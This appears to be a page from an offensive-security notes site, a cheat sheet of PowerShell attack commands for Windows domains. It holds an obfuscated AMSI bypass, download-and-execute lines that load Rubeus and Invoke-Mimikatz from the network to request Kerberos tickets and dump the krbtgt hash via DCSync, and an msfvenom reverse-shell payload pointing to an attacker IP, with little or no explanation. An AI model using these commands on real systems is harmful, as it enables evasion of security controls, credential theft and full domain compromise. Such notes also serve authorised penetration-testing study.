Powershell process-injection

$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)

$x = (New-Object System.Net.WebClient).downloadData('https://path/to/rubeus.exe')

$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256 
/domain:.local /dc:ad03.local
/createnetonly:C:\Windows\System32\cmd.exe".Split())

$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256 
/domain:.local /dc:..local /ptt".Split())


-- If you still have a DA shell anywhere lets try get krbtgt via lsass --
$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)

IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))

Invoke-Mimikatz -Command '"privilege::debug" "lsadump::dcsync /domain:.local /user:\krbtgt"'

Msf-venom:

AMSI bypass:

Msf-venom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.224 LPORT=8008 -f powershell

On windows :

PreviousEXE PackersNextShellter

Last updated